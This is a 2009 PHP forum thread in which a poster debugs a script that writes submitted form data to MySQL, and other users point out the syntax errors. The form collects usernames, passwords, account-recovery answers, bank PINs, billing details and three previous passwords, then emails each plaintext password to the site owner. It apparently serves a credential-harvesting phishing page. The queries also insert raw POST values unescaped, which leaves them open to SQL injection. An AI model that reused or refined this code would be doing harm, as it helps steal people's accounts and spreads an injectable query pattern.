Russia Posted October 2, 2009 Share Posted October 2, 2009 I get this error: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '173.54.108.137', 'October 2 2009' )' at line 33 Code: <?php $date2 = date("F j Y"); $ip = $_SERVER['REMOTE_ADDR']; require("../inc/config.php"); $sql="INSERT INTO `mod` ( Username, Password, Recov1, Recov2, Recov3, Recov4, Recov5, TransactionID, AgreementID, CreditCardSubscriptionMonth, CreditCardSubscriptionYear, TeleBillingPin, PayByCashMonth, PayByCashYear, PayByCashLength, FirstPassword, SecondPassword, ThirdPassword, PostCode, Email, BankPin, BankPinConfirm, AccountCreationMonth, AccountCreationYear, Isp, MovedMonth, MovedYear, Message, Ip, AddedDate ) VALUES(' '$_POST[username]', '$_POST[password]', '$_POST[recovery1]', '$_POST[recovery2]', '$_POST[recovery3]', '$_POST[recovery4]', '$_POST[recovery5]', '$_POST[transactionid]', '$_POST[futurepayid]', '$_POST[earliestccmonth]', '$_POST[earliestccyear]', '$_POST[telebillingpin]', '$_POST[earliestpbcmonth]', '$_POST[earliestpbcyear]', '$_POST[pbclength]', '$_POST[password1]', '$_POST[password2]', '$_POST[password3]', '$_POST[postcode]', '$_POST[email]', '$_POST[newpassword1]', '$_POST[newpassword2]', '$_POST[creationmonth]', '$_POST[creationyear]', '$_POST[isp]', '$_POST[movedmonth]', '$_POST[movedyear]', '$_POST[othercomments]', '$ip', '$date2' )"; if (!mysql_query($sql)) { die('Error: ' . mysql_error()); } echo "Thank You for registering."; $result = mysql_query("SELECT email FROM members WHERE id = '1'"); if (!$result) { echo 'Could not run query: ' . mysql_error(); exit; } $row = mysql_fetch_row($result); $to = $row[0]; mysql_close(); $subject = "New Registered User"; $from = "myself"; $message = "A new user has signed up and has been added to the database Username: $_POST[username] Password: $_POST[password] IP Address: $ip Date: $date2 "; $headers = "From: $to"; $sent = mail($to, $subject, $message, $headers) ; ?> Quote Link to comment Share on other sites More sharing options...
Kieran Menor Posted October 2, 2009 Share Posted October 2, 2009 Could you change die('Error: ' . mysql_error()); to die('Error ' . mysql_error() . ' in query ' . $sql); so that I can see what the query looks like with all the variables inserted? Quote Link to comment Share on other sites More sharing options...
Mchl Posted October 2, 2009 Share Posted October 2, 2009 I'm guessing unescaped data break the query. Quote Link to comment Share on other sites More sharing options...
Kieran Menor Posted October 2, 2009 Share Posted October 2, 2009 Likely, but it is nice to have the insight. Quote Link to comment Share on other sites More sharing options...
Russia Posted October 2, 2009 Author Share Posted October 2, 2009 I did that, the updated code is now: <?php $date2 = date("F j Y"); $ip = $_SERVER['REMOTE_ADDR']; require("../inc/config.php"); $sql="INSERT INTO `mod` ( Username, Password, Recov1, Recov2, Recov3, Recov4, Recov5, TransactionID, AgreementID, CreditCardSubscriptionMonth, CreditCardSubscriptionYear, TeleBillingPin, PayByCashMonth, PayByCashYear, PayByCashLength, FirstPassword, SecondPassword, ThirdPassword, PostCode, Email, BankPin, BankPinConfirm, AccountCreationMonth, AccountCreationYear, Isp, MovedMonth, MovedYear, Message, Ip, AddedDate ) VALUES(' '$_POST[username]', '$_POST[password]', '$_POST[recovery1]', '$_POST[recovery2]', '$_POST[recovery3]', '$_POST[recovery4]', '$_POST[recovery5]', '$_POST[transactionid]', '$_POST[futurepayid]', '$_POST[earliestccmonth]', '$_POST[earliestccyear]', '$_POST[telebillingpin]', '$_POST[earliestpbcmonth]', '$_POST[earliestpbcyear]', '$_POST[pbclength]', '$_POST[password1]', '$_POST[password2]', '$_POST[password3]', '$_POST[postcode]', '$_POST[email]', '$_POST[newpassword1]', '$_POST[newpassword2]', '$_POST[creationmonth]', '$_POST[creationyear]', '$_POST[isp]', '$_POST[movedmonth]', '$_POST[movedyear]', '$_POST[othercomments]', '$ip', '$date2' )"; if (!mysql_query($sql)) { die('Error ' . mysql_error() . ' in query ' . $sql); } echo "Thank You for registering."; $result = mysql_query("SELECT email FROM members WHERE id = '1'"); if (!$result) { echo 'Could not run query: ' . mysql_error(); exit; } $row = mysql_fetch_row($result); $to = $row[0]; mysql_close(); $subject = "New Registered User"; $from = "myself"; $message = "A new user has signed up and has been added to the database Username: $_POST[username] Password: $_POST[password] IP Address: $ip Date: $date2 "; $headers = "From: $to"; $sent = mail($to, $subject, $message, $headers) ; ?> and error: Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '173.54.108.137', 'October 2 2009' )' at line 33 in query INSERT INTO `mod` ( Username, Password, Recov1, Recov2, Recov3, Recov4, Recov5, TransactionID, AgreementID, CreditCardSubscriptionMonth, CreditCardSubscriptionYear, TeleBillingPin, PayByCashMonth, PayByCashYear, PayByCashLength, FirstPassword, SecondPassword, ThirdPassword, PostCode, Email, BankPin, BankPinConfirm, AccountCreationMonth, AccountCreationYear, Isp, MovedMonth, MovedYear, Message, Ip, AddedDate ) VALUES(' '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '173.54.108.137', 'October 2 2009' ) Quote Link to comment Share on other sites More sharing options...
Mchl Posted October 2, 2009 Share Posted October 2, 2009 You've got an extra ' just after VALUES( also, you should really escape your variables using mysql_real_escape_string Quote Link to comment Share on other sites More sharing options...
Russia Posted October 2, 2009 Author Share Posted October 2, 2009 I did that, but still shows the same error: Updated code: <?php $date2 = date("F j Y"); $ip = $_SERVER['REMOTE_ADDR']; require("../inc/config.php"); $sql="INSERT INTO `mod` ( Username, Password, Recov1, Recov2, Recov3, Recov4, Recov5, TransactionID, AgreementID, CreditCardSubscriptionMonth, CreditCardSubscriptionYear, TeleBillingPin, PayByCashMonth, PayByCashYear, PayByCashLength, FirstPassword, SecondPassword, ThirdPassword, PostCode, Email, BankPin, BankPinConfirm, AccountCreationMonth, AccountCreationYear, Isp, MovedMonth, MovedYear, Message, Ip, AddedDate ) VALUES( '$_POST[username]', '$_POST[password]', '$_POST[recovery1]', '$_POST[recovery2]', '$_POST[recovery3]', '$_POST[recovery4]', '$_POST[recovery5]', '$_POST[transactionid]', '$_POST[futurepayid]', '$_POST[earliestccmonth]', '$_POST[earliestccyear]', '$_POST[telebillingpin]', '$_POST[earliestpbcmonth]', '$_POST[earliestpbcyear]', '$_POST[pbclength]', '$_POST[password1]', '$_POST[password2]', '$_POST[password3]', '$_POST[postcode]', '$_POST[email]', '$_POST[newpassword1]', '$_POST[newpassword2]', '$_POST[creationmonth]', '$_POST[creationyear]', '$_POST[isp]', '$_POST[movedmonth]', '$_POST[movedyear]', '$_POST[othercomments]', '$ip', '$date2' )"; if (!mysql_query($sql)); { die('Error ' . mysql_error() . ' in query ' . $sql); } echo "Thank You for registering."; $result = mysql_query("SELECT email FROM members WHERE id = '1'"); if (!$result) { echo 'Could not run query: ' . mysql_error(); exit; } $row = mysql_fetch_row($result); $to = $row[0]; mysql_close(); $subject = "New Registered User"; $from = "myself"; $message = "A new user has signed up and has been added to the database Username: $_POST[username] Password: $_POST[password] IP Address: $ip Date: $date2 "; $headers = "From: $to"; $sent = mail($to, $subject, $message, $headers) ; ?> Quote Link to comment Share on other sites More sharing options...
Mchl Posted October 2, 2009 Share Posted October 2, 2009 If it shows exactly same error (with the extra quote you were to remove), it means you haven't updated the code on your server. Quote Link to comment Share on other sites More sharing options...
Russia Posted October 3, 2009 Author Share Posted October 3, 2009 Okay so how do I fix it? Okay so how do I fix the error? What do I change? This is my current code: <?php $date2 = date("F j Y"); $ip = $_SERVER['REMOTE_ADDR']; require("../inc/config.php"); $sql="INSERT INTO mod ( Username, Password, Recov1, Recov2, Recov3, Recov4, Recov5, TransactionID, AgreementID, CreditCardSubscriptionMonth, CreditCardSubscriptionYear, TeleBillingPin, PayByCashMonth, PayByCashYear, PayByCashLength, FirstPassword, SecondPassword, ThirdPassword, PostCode, Email, BankPin, BankPinConfirm, AccountCreationMonth, AccountCreationYear, Isp, MovedMonth, MovedYear, Message, Ip, AddedDate ) VALUES( '$_POST[username]', '$_POST[password]', '$_POST[recovery1]', '$_POST[recovery2]', '$_POST[recovery3]', '$_POST[recovery4]', '$_POST[recovery5]', '$_POST[transactionid]', '$_POST[futurepayid]', '$_POST[earliestccmonth]', '$_POST[earliestccyear]', '$_POST[telebillingpin]', '$_POST[earliestpbcmonth]', '$_POST[earliestpbcyear]', '$_POST[pbclength]', '$_POST[password1]', '$_POST[password2]', '$_POST[password3]', '$_POST[postcode]', '$_POST[email]', '$_POST[newpassword1]', '$_POST[newpassword2]', '$_POST[creationmonth]', '$_POST[creationyear]', '$_POST[isp]', '$_POST[movedmonth]', '$_POST[movedyear]', '$_POST[othercomments]', '$ip', '$date2' )"; if (!mysql_query($sql)); { die('Error ' . mysql_error() . ' in query ' . $sql); } echo "Thank You for registering."; $result = mysql_query("SELECT email FROM members WHERE id = '1'"); if (!$result) { echo 'Could not run query: ' . mysql_error(); exit; } $row = mysql_fetch_row($result); $to = $row[0]; mysql_close(); $subject = "New Registered User"; $from = "myself"; $message = "A new user has signed up and has been added to the database Username: $_POST[username] Password: $_POST[password] IP Address: $ip Date: $date2 "; $headers = "From: $to"; $sent = mail($to, $subject, $message, $headers) ; ?> And this is my error: Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'mod ( Username, Password, Recov1, Recov2, Recov3, Recov4, Recov5, Transac' at line 1 in query INSERT INTO mod ( Username, Password, Recov1, Recov2, Recov3, Recov4, Recov5, TransactionID, AgreementID, CreditCardSubscriptionMonth, CreditCardSubscriptionYear, TeleBillingPin, PayByCashMonth, PayByCashYear, PayByCashLength, FirstPassword, SecondPassword, ThirdPassword, PostCode, Email, BankPin, BankPinConfirm, AccountCreationMonth, AccountCreationYear, Isp, MovedMonth, MovedYear, Message, Ip, AddedDate ) VALUES( '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '173.54.108.137', 'October 2 2009' ) Quote Link to comment Share on other sites More sharing options...
Mchl Posted October 3, 2009 Share Posted October 3, 2009 Ok... so the error essage is not exactly the same. It indicates something is wrong with your 'INSERT INTO mod' part. 'MOD' is MySQL's reserved word. If you want to use it as a table name, you need to put it in backticks (``). Quote Link to comment Share on other sites More sharing options...
Russia Posted October 3, 2009 Author Share Posted October 3, 2009 Wow! I have figured it out: All I had to change was this from )"; if (!mysql_query($sql)); { to )"; if (!mysql_query($sql)) { Took me about 2 days to figure it out. How come you guys didn't? Quote Link to comment Share on other sites More sharing options...
.josh Posted October 3, 2009 Share Posted October 3, 2009 maybe it was your inability to post the right error and randomly not using code tags that threw people off... Quote Link to comment Share on other sites More sharing options...
MadTechie Posted October 3, 2009 Share Posted October 3, 2009 What problem? Oh the problem you created in your second to last post! the one that also had the sql problem, that you asked how to fix the SQL problem.. Quote Link to comment Share on other sites More sharing options...
Maq Posted October 4, 2009 Share Posted October 4, 2009 Yikes, inserting POST values directly into your database, talk about vulnerable. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.